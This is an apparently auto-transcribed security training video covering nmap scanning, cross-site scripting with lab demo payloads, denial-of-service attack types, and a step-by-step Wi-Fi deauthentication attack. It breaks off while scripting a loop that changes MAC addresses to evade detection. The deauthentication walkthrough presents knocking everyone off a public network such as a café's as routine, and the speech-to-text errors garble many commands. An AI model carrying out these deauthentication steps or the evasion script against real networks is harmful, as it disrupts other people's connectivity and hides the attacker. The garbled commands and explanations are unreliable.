97 98 99.
Okay.

this is our result.
It gives us a bunch
of ports and services now
as I just said this thing

can be also closed
and also unable Available.
So open and closed

we see both the examples.
Okay, so that was about

how you can scan multiple ports.
So you can also scan multiple

boards with this command
as I will show you.
So what I do not one six eight

dot one dot one to Thirty.
Now what this will do

is basically scan everything
from 192.168.1.1 to 192.168.1.2

up to 30 like that.
So this is a very useful way

of actually scanning.
Tubal IP addresses.

how that works.
Since we have used the a flag,
this is going to work

considerably faster now
This had taken around

a hundred nineteen seconds.
So that's round two minutes now.
This will take

a considerably less a time.
So, let's see this was done

in 29.91 seconds,
and we'd it 30 IP addresses.
So we see that -
F surely speed ins
the whole scanning process now,
you can also give nmap

a Target list now,
let me Could Target list

so targets D XD.
We just got it out for you.
So that's starting it now.
All I want to do
is edit this file.
So, let me just edit

that file and put
a 192.168.1.1 192.168.1.2
192.168.1.3 192.168.1.5
for 192.168.1.5 or 15.
Boom Rose.
Sit now, all we have

to do is save it.
So that saves it and control

X to actually access it.
Now, you can go ahead and view

what is a target set txt.
So as you guys can see this is

what isn't Target such cxt.
And now you can just pass it

to end map with the IL flag
and you could say that nmap

is going to actually
scan all the IP addresses
that are in this file.
So let that just run.
So this will take

because it's five IP addresses
and it's really radical

the fast boat 83%
of our work is done.
Okay.
So as we see our scan

has been completed now,
what do you see out

here is scan results
for whatever we had provided

and targets dot txt list.
So that's how you can also

provide and map input file
and it will give you the results

for all the targets
that were specified in the file.
Now, let's go ahead
and talk about a little bit

on Port scanning.
So nmap is also A brilliant tool

for scouting boards.
And if you have

a server or web site,
you know that there are

65535 ports out there
or every silver and almost 99%

are unused so sometimes kind
of ports is really
at the society.
Now you can scan boards

by just using the pflag
and specifying the port number

and this is how you would do it.
And if you just specify

the IP address after that,
so I'm going to use

w-w-w dot Ed u-- record.
Go and what you can also do is
this will scan only

the port number 20,
but you can also scan

from port number 20 to 25.
You can also put in comas

and tell and lap.
You also want to scan all these
are the port 80 is HTTP

and 443 is HTTP,
so you can surely do that.
So let me just go
ahead and run this.
Okay, so that gives us

an information on the boards
that is there now

something about ports.
Also you suppose, you know.
You want to scan

for some HTTP Port
so you can just say and map

and with the -
be you can just say
that I want to scan

the HTTP board www dot Ed u--
red card dot go so that will

just go ahead and do that.
And as you guys can see
that give us a result

and you can also add
in stuff like MySQL FTP

and stuff like that.
So let me just see show you
how that rods okhttp

is done poor Sgt.
Okay, so as you can You

guys can see these artboards
that are running and it gave us

according to the day.
Now.
If you want to scan

all the ports,
you can use - P -
and the IP address

at www.deeptrekker.com.
Now this generate

takes a lot of time
because you're basically

doing 65,000 scan.
So I'm not really

going to do that.
I'm going to quit this out.
Another thing
that I want to show you all

that generally takes a lot
of time to actually
execute is called something
like an aggressive scam.
So as you guys can See out here.
I have done an aggressive

scan on Ed Eureka.
So do that.
All you have to do

is and map - A
and then you go

Eddie record dot go.
So let us see how much time
did this take to actually

execute this deck 459 seconds
that's long time for scan,
but it gives us a bunch

of other information.
For example, it gives

us the traceroute.
So what is the traceroute first

of all so traceroute
is the route taken by a packet

to to actually reach the clients
and the target cell.
So as you guys can see our back

it had 22 hops first went
to the first stop was

to the Gateway router
that is 192.168.1.1.
Then when to the Airtel lease

line then rent this IP address
that went to the pslv SNL dotnet
and it went to London

New York the Chicago
and the went all the way up to

wherever this thing has hosted
that was some information
and then there is

some other Information
given to us like the TCB open
TCB rap program version

sport type sport States
and all sorts of other

information is given about
in an aggressive scan
another scan that I

have previously also done
and kept for y'all is
because it takes a lot of time

and I have done something
called this service

version so and map -
s and V where V Capital will

give you the service version.
So it tries to actually
guess the word.
Asian of the service

that is running.
So for example on TCP Port it

tells us it is postfix SMTP D
or the Apache.
It's Apache HTTP D.
You can see all sorts

of versions that are here.
Another thing and map

is generally brilliant
is for guessing
the operating system
that is running.
Oh, I have already done

this can previously
because this takes

a humongous amount of time
that I don't really have and

that is three eighty six point
three four seconds
and this can together

basically took me.
In ten minutes,
and I don't really

have that kind of time
for explaining all this stuff.
So as you guys could see

out here the OS get is
kind of os detail is fortunate
for the gate it kind of

tries to guess the OS
upon the time to live
that is in the response

from the packets
that it sends.
So - SVP - oh and -
A are some really

cool stuff stuff
that you might want to know.

Another thing that you
can do is trace route
as I had just told y'all

and y'all can do Trace.
Trout separately.
So you go - -
traceroute and then you say

the name of any sort of website.
So suppose.
I want to know
how I reach netflix.com.
So I go netflix.com and this

will give me a trace route
that shows me how my packet

actually reaches the flicks.com.
Okay.
it was a direct one hop.
Okay, so that was surprising

all the other hand.
If I were to do this
on Eddie record dot
go it would take A bunch

of hops to actually reach
that it is by just
take some time to run.
Okay, so it's 94 percent down.
I'm just waiting

for it to get completed.
Okay.
So this gave us a hop and

as you guys can see we took
twenty two hops to actually

reach a direct cannot go
and it's the same process you go

through a bunch of IP addresses
and then you reach

this thing called you
as West do compute
that Amazon AWS.
Okay, so that was
about traceroute now just

to end this tutorial.
Let me just tell you guys
that you all can also save

a file to add map.
And that is basically save

all whatever you found
from a search into a file

and let me just show you
how to do that.
Now.
Sometimes when you are working

as a security analyst you
will have to perform Network

scans on a wide area network
that is huge.
It's basically huge

these cards take a lot of time
and you don't really have

the space or your command line
to actually store
that and see that in the parade.
That is feasible.
Little for analysis.
So what do you want to do

is actually save it in a file.
So what you can do

is say Ed map.
Oh n and then you
can see the other file we

could say results Dot txt,
and we could save this in file.

So w-w-w dot Ed u--
Rekha dot go.
So whatever search result
is going to be generated
is going to be stored
in this file called

results dot txt.
Now.
This file need not exist.
List from before it will just

be created by and map
and now you see if I do LS.
We have a Target
or a results dot txt.
Now if I just cut out that file,
let me just less it

actually results Dot txt.
And what you see out here

is an nmap scan result
that is stored.
Another thing that I would like

to show you all before I end
this at map tutorial

is a verbose mode.
So for verbose mode is basically
when we were pressing

up arrows to see
how much of our scan is done.
You can basically do

that for postponed.
Take all - F + -
V for verbose and you

could say www dot Ed u--
record Dot and this

will basically give
you a verbose mode of

what is actually going on.
I'll tell you everything
and boom roasted there it's done
and we have finished

our and map tutorial
and now you see if I do LS.
We have a Target
or a results dot txt
if I just cut out that file.
Let me just less it

actually results Dot txt.
And what do you see out

here is an nmap scan result.
That is Stored a lot of thing
that I would like to show

you all before I end this
at map tutorial
is a verbose mode.
So for verbose mode is basically
when we were pressing

up arrows to see
how much of our scan is done.
You can basically do

that for postponed.
So you go - F + -
V for verbose and you

could say www dot Ed u--
record Dot and this

will basically give
you a verbose mode of

what is actually going on.
I'll tell you everything

and boom roasted there it's done
and We have finished

our and map tutorial.
So first of all,
what exactly is
cross-site scripting?
Well cross-site scripting
refers to client-side
code injection attacks
where in an attacker
can execute a malicious script

also commonly referred
to as a malicious payload
into a legitimate website
or web application now xss is

amongst the most rampant
of web application
vulnerabilities and occurs
when of Web application

makes use of something
like a nun validated
or unencoded user input

within the output
that it generates Now

by leveraging xss
and attacker does not Target

a victim directly instead
an attacker would be exploiting

a vulnerability within a website
or something like
a web application
that the victim would visit
and essentially using

the vulnerable website
or the web application

as a vehicle to deliver
a malicious script
to the victims browser.
Now while exercise

can be taken advantage
of within a virtual box script

ActiveX and Flash
unquestionably the most

widely abused is Javascript.
This is mostly
because JavaScript
is the fundamental
to any browsing experience all
the modern sides today have some

JavaScript framework running
in the background
now xss can be used
in a range of ways
to cause serious problems.
Well, the traditional is uses

of exercise is the ability
for an attacker to steal.
Session cookies allowing
an attacker to probably
impersonate a victim and
that Justin's and that

just doesn't stop there.
So exercise has been

used to wreak havoc
on social websites spread
malware website defa commence

and fish for credentials
and even used in conjunction
with some clever social

engineering techniques
to escalate to even
more damaging attacks.
Now cross site scripting

can be classified
into three major categories.
So the first is reflected

cross-site scripting.
The second is stored or

persistent cross-site scripting
and the third is dom-based

cross-site scripting so
out here Dom refers
to the document object model
that is used file

web application building.
So let's take a moment

to discuss the three types
of cross-site scripting.
So the first one we're going

to be discussing is reflected
cross-site scripting Now
by far the most common type

of cross-site scripting
that you'll become.
Because is probably reflected

cross-site scripting here.
The attackers payload
is a script and has

to be part of a request
which is sent to the web server

and reflected back in such a way
that the HTTP response

includes the payload
from the HTTP request Now

using a phishing email
and other social engineering

techniques the attacker layers
in the victim to inadvertently

make a request to the server
which contains the cross

site scripting payload,
and then he ends up

executing the script
that gets reflected and cute it

inside his own browser.
Now since reflected cross-site

scripting isn't really
a persistent kind
of attack the attacker
needs to deliver
this payload to each victim
that he wants to serve.
So a medium like a social

network is very conveniently
used for destination

of these attacks.
So now let's take

a step by step.
Look at how cross-site

scripting actually works.
So firstly the attacker

crafts a URL containing
a malicious string
and sends it to the victim.
Now the poor victim

is tricked by the attacker
into requesting the URL

from the website,
which is running
a I respond script
and then the website

includes the militia string
from the URL in the response.
And then in the end

the victims browser executes,
the malicious script

inside the response sending
the victims cookies to

the attacker silver.
Okay.
So at first reflected xss

might seem very harmless
because it requires a victim

himself to actually send
a request containing
a militia string now
since nobody would be
willingly attacking himself.
no way of actually
performing the attack but
as it turns out there are

at least two common ways
of causing a victim
to launcher reflected
cross-eyed attack on himself.
So the first way is
if the user or targets

a specific individual
and the attacker can send

the malicious URL to the victim.
For example using email

or for example instant messaging
and then trick him

into visiting the site.
Secondly if the user

targets a large group
of people the attacker

then can publish the link
or the malicious URL
or his own website

or social media,
and then he'll just wait

for visitors to click on it.
So these two methods are similar
and both can be very

successful with the use
of a URL shortening service

like one provided by Google.
So this masks the militia

string from users
who might otherwise identifier.
Okay.
So that was all about
reflected cross-site scripting.
Let's move on to store

cross-site scripting now.
So the most damaging type

that is there today

is persistent or stored
cross-site scripting installed

cross-site scripting attacks.
It attacks.
I'm sorry installed

The attacker is injecting

a script into the database
that is permanently stored

on the target application.
So a classic example
is a malicious script
inserted by an attacker
in the comment field or on

a blog or a forum post.
So when a victim navigates
to the affected webpage

now in a browser
The cross site scripting

payload will be served.
As a part of the web page just
like any legitimate

comment would be now.
This means that the victim

will be inadvertently ended
up ending up executing
the malicious script.
Once the page is viewed

in the browser.
Now, let's also take

a step by step.
Look at how cross-site scripting
in the stored version works.
So the attacker uses one

of the websites form to insert
a malicious string into

the websites database first.
Now the victim unknowingly

request the page
from the website
and then the website Glued

some malicious string
from the database

in the response
and then sends it to the victim.
Now the poor victim

will be actually executing

inside the response
and sending all the cookies

to the attackers server.
So that's basically
how stored or persistent

cross-site scripting works.
Now it's time for the last type

which is document object model

based cross-site scripting.
So dom-based cross-site
scripting is an advanced type
of cross-site scripting attack.
So which is made possible
when the web applications

client-side script writer uses
provided data to
the document object model.
So basically it means
that data is subsequently read

from the document object model
by the web application
and output it to the browser.
So if the data is incorrectly

handled in this place
and attacker can very

well inject a payload,
which will be stored as a part

of the document object model
and then executed
when the data is read

back from the Dome.
No, let's see how

that actually happens.
So first attacker craft

the URL containing
a malicious string
and sends it to the victim.
Now this victim is again

tricked by the attacker
into actually requesting

the URL from the website.
This is like the primary step
in actually performing
Now the third step is
that the website receives

the request but does not include
the militia string

in the response.
Here's the catch of

dom-based cross-site scripting.
So now the victims browser

executes the legitimate script
inside the response.
Causing the malicious script

to be inserted into the page
that is basically
into the inner HTML attributes
and the final step is then
the victims browser then
executes the malicious script

inserted into the page
and then just sends
the victim the cookies

to the attacker silver.
Now if you guys

must have realized
in the previous
examples of persistent
and reflected cross-site

scripting those server inserts,

into the page,
which is then sent as

a response to the victim now
when the victims browser

receives the response it assumes
that the malicious Ripped

is to be a part
of the pages legitimate content
and then automatically

executes it during page load as
with any other script would be

but in a Dom base attack,
there is no malicious script

insert it as a part of the page.
The only scripts
that are being actually

automatically automatically
executed during the page load is

legitimate part of the page.
So that's the scary part.
So the problem is
that this legitimate script

directly makes user input
in order to add
HTML to the page.
So the militia string
is inserted into the page

using Nice chairman,
so it's pastas sgml.
So mostly people
who are actually in servicing
or surveying any server for

They will not be actually

checking the client side.
So it's a very subtle difference

but it's very important.
So in traditional cross site

scripting the militias
JavaScript is actually executed
when the page is loaded as

a part of the HTML server
and in dom-based
cross-site scripting
the militias JavaScript

is executed at some point
after the page has

already been loaded.
Because the page is

legitimate JavaScript treating
user input is using it

in an unsafe way.
So now that we have actually

discussed all the three types
that is varied that is

widely available today.
Now, let's see

what can actually happen
if cross-site scripting will
if you were actually a victim

of cross-site scripting,
I'm sorry.
So, let's see what can happen
if you actually were a victim

So the consequences of
what an attacker can do
with the ability

to execute JavaScript
on a webpage may not immediately

stand out to you guys,
but especially
since browsers like Java

like Chrome run JavaScript
in a very tightly controlled

environment these days
and JavaScript has

very limited access
to users operating systems

and user files.
But when considering
the JavaScript has the access

to the following
that we're going

to discuss we can only see
how creative JavaScript

attackers can get.
So firstly with malicious

JavaScript has access
to all the same objects
that the rest of the web page

has so this includes a thing
called cookies now
cookies are often used

to store session tokens.
And if an attacker can obtain

a user session cookie,
they can impersonate that user
anywhere on the internet.
Secondly JavaScript can read

and make arbitrary modifications
to the browser's
document object model.
So your page will

just be incorporated
with all sorts of scripts
and viruses without You even

knowing from the server side now
JavaScript can be used
with the XML HTTP request

to send HTTP request
with arbitrary content

to arbitrary destinations.
And the most scary part is
that JavaScript and modern

browsers can leverage HTML5 apis
such as accessing a user's

geolocation webcam microphone
and whatnot and even
specific files from

the users file system.
Now while most of these apis

require the users to opt
in cross-site scripting
with in actions
with some very
clever social engineering

can bring an attacker
of very long way now

the above in combination
with social engineering
as I just said allows
an attacker to pull
off Advanced attacks,
including cookie theft
keylogging fishing
and identity theft to now
critically cross-site scripting

vulnerabilities provide.
The perfect ground
for attackers to escalate

attacks to more serious ones.
So now that we understand what

cross-site scripting attacks are
and how damaging they can be

to your application.
Let's dive To the

best known practices
that are actually followed to

prevent them in the first place.
So the first mechanism

that is used is called escaping.
So escaping data means
that taking data and application

has received and ensuring
that it's secure before actually

rendering it for the end user.
Now by escaping
user input key characters
in the data received by

a web page will be prevented
from being interpreted
in any malicious sort

of way now innocence
your censoring the data

or webpage receives in a way
that will disallow characters

especially those brackets
that begin the HTML attributes

like in HTML and I'm G
so these will be stopped

from being rendered
which would otherwise cause harm
to your application
and users and database,
but if your page doesn't allow

users to add their own code
to the page A good rule of thumb

is We need to escape any
and all HTML URL

and JavaScript entities.
However, if you
are running a forum
and you do allow users

to as Rich text to your content,
you have a few choices.
So firstly you will need

to carefully choose
which HTML entities

you will escape
and which you won't

or buy replacement format
for raw HTML such as markdown
which will in turn allow

you to continue escaping all
the sorts of HTML characters

now the second method
that is normally used

is called validating input
And so validating
input is the process
of ensuring an application
is rendering the correct data
and preventing malicious data
from doing harm to the site

the database and the users.
So while whitelisting and input

validation are more commonly
associated with stuff

like SQL injection,
they can also be used as
an additional method
of prevention for
So input validation
is especially helpful
and good at preventing

cross-site scripting in forms
as it prevents a user
from adding special.
Characters into the fields

instead of refusing
the quest completely.
But in fact valid

input validation is
not the primary method of

prevention for vulnerabilities
such as cross-site scripting
and even SQL injection

for that example,
but instead they help to reduce

the effects should an attacker
actually discover such

a vulnerability in your system.
Now the third way to prevent

cross-site scripting attack
is to sanitize user input.
So sanitizing data
is a strong defense
but should not be used alone
to battle cross-site
scripting attacks.
It's totally possible.
Will that you find the need

to use all three methods
of prevention in working towards

a more secure application.
Now as you guys might notice

that sanitizing user inputs is
especially helpful on sites
that allow HTML markup to ensure

data received Can Do no harm
to users as well
as your database
by scrubbing the data clean

of potentially harmful markup
and changing the

unacceptable user input
into an acceptable format.
OK guys.
So that was all the theory about

cross-site scripting it's time.
Demo right now.
So for the demonstration now,
I'm going to be showing

you guys the three types
that we have discussed

throughout the course
of the session.
So not only will this be

a rather interesting to see
how cross-site scripting works

on a vulnerable web application,
but it will also give
us a better understanding
in itself now to perform

cross-site scripting is
a very big crime.
So we really can Target

any random web platform website
or web application
for that matter.
So keeping that thing in mind I
have chosen the broken

web application project.
So this is brought
To Us by a wasp
which stands for open source web

application security project.
The broken web application

project or Bebop is
a broken web application
that is intentionally vulnerable
and it incorporates
a majority of the known bugs
that are out there

and it is widely used by
security enthusiastic students
and practicing ethical hackers

to mostly practice
and nurture their skills

in the right direction.
Okay, so to get started

first of all,
we need to download a few

files and get things ready.
So first of all,
we will download the broken web.
Ation project
and I'll be leaving

the download link
in the description just in case

you guys want to practice
in your own free time.
Secondly.
We need to download
a virtual box.
Now after we have

both the files ready
and we have it installed
and we have our broken

web application installed
in the virtual machine.
We are good to go.
Now.
I've already done

all that boring job
and actually installed

the broken web application
as you guys can see.
I'm already running
the owasp broken web application

on my virtual.
And this is the Oval

Office virtual machine.

it's based off Linux
and if we go ifconfig,
it'll give us the IP address

that it's running on.
So as you guys can see,
it's running on 192.168.1 46.4

so If we just head over there,
yeah, I've already open that up.
We get a portal.
So for this
particular demonstration,
I'm going to be using the broken

web application project
and also webgoat.
So first of all,
let's head over to the broken

web application project.
So we'll be greeted
with a login screen out here
and the credentials
for this is B and Bug
as you guys can see,
so just go and enter login

after you enter the credentials.
Okay, so y'all will be

welcomed with a place
where you can choose your bug
and you can also choose

the amount of security
that you want to practice with.
So since this is
a very simple demonstration,
I'm going to set

the security too low.
And the first thing
that we're going

to test is actually
reflected cross-site scripting.
So reflected cross-site
scripting mostly has things
to do with the get request
when we are actually

coding on the back end.
So, let's see.
First of all we go ahead
and choose reflected cross-site

scripting for the get method
and we go and press hack.
Now will be presented

with a form.
Now form is a very good way
of actually showing
reflected cross-site scripting
because normally when

an attacker will be trying
to attack you he'll be trying
to send you a form or any way.
You can actually input
something into the his

soul so interestingly
if we go and just in put nothing

into these two fields
and just go will see

the URL change out here.
So firstly you guys see
that it's the fields are

very clearly visible
and These are the two fields

and that means
that it's an uncoded input.
So this is a very rich place
to actually practice
your web vulnerability
and penetration testing skills.
So if I were to hackl,
I would try and run

a script out here.
So if I were to go script
and I've already

practiced a few out here
as you guys can see,
so if you go script alert,
this is an example
of reflected xss.
Yeah, and if we go and just

end the script out here.
This is going to actually render
the JavaScript input

as a part of the page
and we are going to get

an output because of this.
So that's how reflected
cross-site script
is actually working.

we the what am I saying?
As you guys can see

the web application has actually
rendered our JavaScript

and now we can see
that reflected cross-site
scripting is actually
working out here.
So now you guys

must have realized
that in a practical scenario.
This form must be

sent to the victim
and must be tricked

into filling the form
for the attack to be successful.
Also in more practical scenarios
where sites are

also having forms.
They're going to be putting

filters to the Of
the input parameters such
that you cannot run

JavaScript in them
and you cannot also input

any unencoded inputs into them.
So that was all

about reflective JavaScript.
I mean reflected
So now let's move

on to store cross-site scripting
which is the most dangerous form

Okay, so as I had discussed
the comment sections are

normally the best place
for actually stored

so as you guys can see out here
if we already have
a few comments
that had added for practicing

now in store cross-site
scripting the attacker

is normally attacking the data
that is stored.
So basically we are going

to inject the script
into the database

into the server.
So if the script has

some malicious intent
and it can do
a multitude of thing
if it has a malicious intent

will not get into that.
So for that reason,
let's first add

a normal comment out here.
So let's say
if this was blog

I'd say good job there.
Like I said
or something like hey,
man, nice work.
If you go and
press submit, okay,
it's showing this is

an example of persistent
cross-site scripting
because I had already

inserted malicious script.
So this is that script out

here the second input but just
for demonstration purposes.
Let's go in and put it again

so we can also input raw data
that is unencoded input

in the form of script.
So let's go alerts.
Unless his print hello world.
So if we go and press submit

so at first ones
that other cross-site script

and then it will say
that this page isn't working.
So this is also a very

good example now we
have two scripts actually

running on this page.
So the first one is
actually this is an example of

cross-site scripting persistent.
So that was the second one

and then comes the hello world.
So that's actually two scripts

running back to back.
So anybody if I were
to actually come back
to this side any other day
and these comments

existed It would just
get automatically executed

from the database
because just because we

are referring to it.
Okay, so time for
dom-based cross-site scripting
and I was using this application

for the first time yesterday
and I realized
that there is actually

no way that we
can actually test dom-based

cross-site scripting you.
So to actually test
on base cross site scripting
we are going to be using

this thing called webgoat.
Now the login credentials
to webgoat is guests
for the username
and guests for the password.
I'd already logged in

so it didn't ask me.
So now if we go out here
and go on the cross

site scripting in xs/s,
you will also see

that there is no options
available for actually donbass

cross-site scripting this is
because it's under

a acts security or Ajax
if you might pronounce

it that way.
So in this is
under a acts security
because if you guys remember

we had just discussed
that don't be cross site

scripting is a client-side
So things like a normal script

would normally be checked
on the server side.
But when we are talking

on client side,
we are talking about languages

like HTML a acts etcetera
so you can put your scripts

in HTML form.
So suppose we were to go
so let's input a script first.
So suppose you have

to go script.
Hello world now.
If we go and submit the solution

nothing actually happens
because we are actually putting

in encoded in puts out there.
It's the Dom that is unencoded.
Now if we were to actually go in

and input in a language
that the client-side actually

understands for example HTML,
so we immediately get a result.
So first of all,
it's going to actually

manipulate the inner
HTML attributes of this site.
So if we go image
and we put a source now,
let's not give the source

anything and on alert
on are urado on an error.
We're going to run

some simple JavaScript so alert
And we can say this is

an example of dom-based xss.
Now as soon as I end

end the image tag,
this is going to get done

because the client side
is always rendering
the client-side page.
So watch this.
Sorry, I think
I miss type somewhere.
Let's go again so image.
Unless you something I've

already used and you can see
that it says hacked and out.
He'll we've not even

press submit solution.
So out here you can see
that as soon as we completed

it is again saying hacked so
that means as soon as you

complete the query or
the client-side HTML language,
so that will completely
trigger the cross-eyed

payload image tag.
This is going to get run
because the client side

is always rendering
the client-side page.
So watch this.
I'm sorry.
I think I miss type somewhere.
Let's go again so image.
Okay, let's use something I've

already used and you can see
that it says hacked

and out here.
We've not even
press submit solution.
So out here you can see
that as soon as we
completed it is again saying
that so that means as soon

as you complete the query or
the client-side HTML language,
so that will completely

trigger the cross-eyed payload
firstly let's go
or what does and DDOS means now

to understand a DDOS attack.
It is essential to understand
the fundamentals of a Dos attack
does simply stands

for denial of service?
The service could be

of any kind for example,
imagine your mother

confiscate your cellphone
when you are preparing

for your exams to help you study
without any sort of distraction
while the intentions of

your model is truly out of care
and concern you are being denied

the service of calling
and any other service offered

by your cell phone now
with respect to a computer

and computer networks.
A denial of service
could be in the form
of hijacking web servers

overloading ports,
which request rendering
them unusable the dying

Wireless authentication
and eyeing any sort of service
that is provided
on the internet attacks
of such intent can be performed

from a single machine
while single machine attacks

are much easier to execute
and monitor their also easy
to detect and mitigate

to solve this issue.
The attack could be executed

from multiple devices spread
across a wide area.
Not only does this make

it difficult to stop the attack
but it also becomes

near impossible to point out.
The main culprit such attacks

are called distributed denial
of service or DDOS attacks.
Now, let us see how they work

the main idea of a U.s.
Attack as explained
is making a certain service

unavailable since everything
that is attacked is
in reality running on a machine.
The service can

be made available.
If the performance of
the machine can be brought down.
This is the fundamental

behind dose and DDOS attacks.
Now some dos attacks

are executed by flooding servers
with connection requests

until the server is overloaded
and is deemed useless others

are executed by sending
unfragmented packets to a server
which they are unable

to handle these methods
when Muted by a botnet
exponentially increase
the amount of damage
that they are doing
and their difficulty

to mitigate increases in Leaps
and Bounds to understand more

about how these attacks work.
Let us look at the different

types of attacks.
Now while there are plenty of

ways to perform a DDOS attack.
I'll be listing down

the more famous ones.
These methodologies have become

famous due to their success rate
and the Damage they

have caused over time.
It is important to note
that with the advancement
and Technology.
The more creative minds

have devised more
devious ways to perform.
Dos attacks.
Now the first

type of methodology
that we are going to discuss

is called ping of death now
according to the TCP IP protocol

the maximum size
of the packet can be
65,535 bytes the Ping
of death attack exploits

this particular fact
in this type of attack.
The attacker sends packets
that are more than

the max packet size
when the packet fragments

are added up computers
generally do not know
what to do with such

packets and end up freezing
or sometimes crashing
entirely then we come
to reflect on the docks

this particular attack.
Iraq is more often than not used

with the help of a botnet.
The attacker sends a host
of innocent computers
a connection request
using a botnet which are

also called reflectors.
Now this connection

that comes from the botnet looks
like it comes from the victim

and this is done
by spoofing The Source part

in the packet header.
This makes the host

of computers send
an acknowledgement to
the victim computer
since there are

multiple such requests
from the different computers
to the same machine this

overloads the computer
and crashes it this type
of attack is also known

as a Smurfette.
Another type of attack is called

mail bomb now mail bomb attacks
generally attack email

servers in this type
of attack instead of packets

oversized emails filled with
random garbage values are sent

to the targeted email server.
This generally crashes

the email server
due to a sudden spike in load

and renders them useless
until fixed last
but not the least we

have the teardrop attack.
So in this type of attack,
the fragmentation offset field
of a packet is abused
one of the fields
in an IP header is a fragment
offset field indicating
the starting position or offset.
Of the data contained

in a fragmented packet
relative to the data

in the original packet
if the sum of the offset
and the size of one fragmented

packet differs from that
of the next fragmented packet

the packet overlap now
when this happens a server

vulnerable to teardrop attacks
is unable to reassemble
the packets resulting
in a denial
of service condition.
Okay.
So that was all the theoretical

portion of this video now,
it's time to actually perform

our very own DDOS attack.
Okay.
So now that we finish

the theoretical part
of how DDOS actually works
and what it actually is

but it's different types.
Let me just give you guys

a quick demonstration on
how you could apply a denial
of service attack
on a wireless network
anywhere around you
like this could be

somewhere like Starbucks
where you're sitting

or this could be a library also
or your college
institution no matter
where you're sitting

this procedure will work.
So the first thing we want to do

is actually open up a terminal
as because we were Be doing

most of our work
on a command line basis.
Now for this

particular demonstration.
We will be actually using

two tools first is aircrack-ng,
which is a suit of tools
which contains aircrack-ng

airmon-ng a replay
and G and airodump-ng.
So these are the four tools

that come along with it.
And the second one
that we'll be using

is called Mac change of okay.
So let me just put

my terminal on maximum.
So you guys can see

what I'm actually writing out.
So first thing we want to do

is Actually log in as root.
So let me just do that quickly
because we need to login as

root because most of the stuff
that we're going to do right now

will need administrator access.
Now.
If the first thing we

want to do is check out
our wireless network cards name
and we can do that easily

by typing ifconfig.
Now, you can see
that my wireless card is called

WL 1 and we get the MAC address
and we also get the IPv6 dress.
So that's my wireless network

card and we'll Actually setting
that up in monitor mode now
before we actually go in
to start up our Network
are in monitor mode.

how you can install
the two tools that I just spoke

about that is aircrack-ng
at Mac changer.
So do install aircrack-ng.
You can just go app get
install aircrack-ng hit enter

and this should do it for you.
So it's not going to do

much to install mac changer.
You could just go

the same command
that is zap get

install mac changer
and you can check
if both the tools

have been installed properly
by opening the manual pages

by typing man aircrack-ng
and this will open up

the manual page for you.
And let's also do

the same format to ensure.
So what we're going

to do first is set up
our network interface card

into monitor mode.
So to do that,
all we have to do
is type ifconfig,
and we need to put

a network interface card down.
So we go.
Wlo one down and with

the command IW Go mode monitor.
Don't forget to specify
the interface that

you're working on.
So IW config WL 1 mode Monitor
and all you have to do

now is put it back up.
So what we are going

to type is ifconfig.
Wl1 up.
You can check the mode

it will see managed
if it's monitoring mode.

it says mode managed,
so that's how we're going

to go ahead so you can check
that just for your own purposes
so we can also check for only.
Wlo one by
specifying the interface.
Or you could also check

the mode only by passing it
through a pipe function

and that is using grep mode.
So IW config wl1 crap and mold.
Well mode begin

to the capital M.
So that's how you

would probably return it.
that has returned

the mode for us icon
along with the access point

and the frequency.
Okay, so that was

a little fun trivia on
how you could fetch the mode
from a certain command
that like iwconfig

by passing it through a pipe
and Open your list mode crap

basically means grab.
Okay, so now moving on we

will get to the more
important stuff now so

firstly we need to check
for some sub processes
that might still be running and
that right actually interfere

with the scanning process.
So to do that,
what we do is airmon-ng check
and then the name

of the interface now
as you guys can see I have

the network manager
that is running out here

and we need to kill that first
and that can be easily

done by going kill
with the PID after that.
You can run

a general command called.
Old airmon-ng check
and kill so whatever it finds

it will kill it accordingly
and when it produces

no results like this,
that means you're ready to go
as there are
no sub processes running
that might actually

interfere with us
can now what we want to do
is we want to run a dump scan
on the network interface card
and check out all

the possible access points
that are available to us.

this produces a bunch
of access points and they come

with their be ssids there.
So have the power

which is the pwr
that is the power of the signal

and let me go down back again.
So yeah, you can see the beacons

you can see the data you can see
the channels available

and what the bssid is.
It's the Mac ID
that is actually tied

in with the essid
which basically represents

the name of the router.
Now, what we want to do

from here is we want
to choose which router

we want to actually dose.
Now, the whole process

of dosing is actually
we will continue Sleety

authenticate all the devices
that are connected to it.
So for now I have chosen

Eddie Rekha Wi-Fi to actually
toss out and once I send it

the authentication broadcast,
it will actually
the authenticate all the devices

that are connected to it.
Now this the authentication
is done with a tool

called are replay
which is a part of
the aircrack-ng suit of tools.
Now.
Let's just see
how we can use are a play

by opening up the help command.
So we go - -
help and this opens up

the help command for us.
Now as you guys

can see it shows us
that we can send a D'Orsay.
Gation message by tapping into -
0 and then we need

to type in the count.
So what we are going

to do is type in -
0 which will send

the DL syndication message
and now we can dive 1 or 0.
So 1 will send only

one the authentication message
while 0 will continuously

Loop it and send a bunch
of the authentication messages.
We are going to say zero

because we want to be sure
that we are the authenticating

everybody and we can also
generally specify the person.
We also want to specifically

the authenticate but for
this demonstration,
I'm just Just going to try

and the authenticate everybody
that is there.
So what we are going to do is
we are going to copy down

the MAC address or the bssid
as you would know it
and then we are going to run

the authentication message.

Rd authentication message
is beginning to hunt
on Channel Nine.
Now as you guys know

and as I already know
that our bssid or Mac address

is working on Channel 6 now,
we can easily change the channel

that are interface.
Working on by just going

IW config WL 1 and then Channel
and then specifying the channel
as you guys can see our chosen

router is working on Channel 6.
So that's exactly
what we're going to do.
Now as you guys can see it

immediately starts sending
the authentication codes

to the specified router
and this will actually

make any device
that is connected
to that router almost unusable.
You might see that you are

still connected to the Wi-Fi,
but try browsing the internet

with them you will never be able
to actually Each any site
as I'm constantly
the authenticating
your service you will need
that for a handshake

all the time.
And even if it completes you are

suddenly the authenticated again
because I'm running

this thing on a loop.
Now, you can let this command

run for a few moments
or how much of a time you want

to DDOS at guy for well,
this is not exactly a DDOS
because you're doing it

from one single machine,
but you can also optimize

this code to actually looks
like it's running

from several different machine.

how to do that.
We are going to write a script

file to actually optimize.
Is our code lat

so this script file
will actually automate

most of the things
that we just did

and also optimize a little
by changing our Mac address

every single time.
So we become hard
to actually point out.
So the first thing

that we want to do is
we want to put our wireless
network card down and maybe
that's not the first thing

that I want to do.
Just give me a moment

to think about this.
I haven't actually thought

this true I'm doing
this on the Fly.
Okay.
So the first thing
that we're going to do

is we're going to start
a while loop that Is going

to continuously run
until we actually
externally stop it.
So we go while true
and then we're going to say do
and the first thing

that we want to do
is send out the authentication

message and we are going
to send a it around 10
the authentication messages
and we want to run it

on a specific bssid.
So that is the bssid

that had copied.
So let me just put in that
and then we just put

in the interface
is it supposed to work on now?
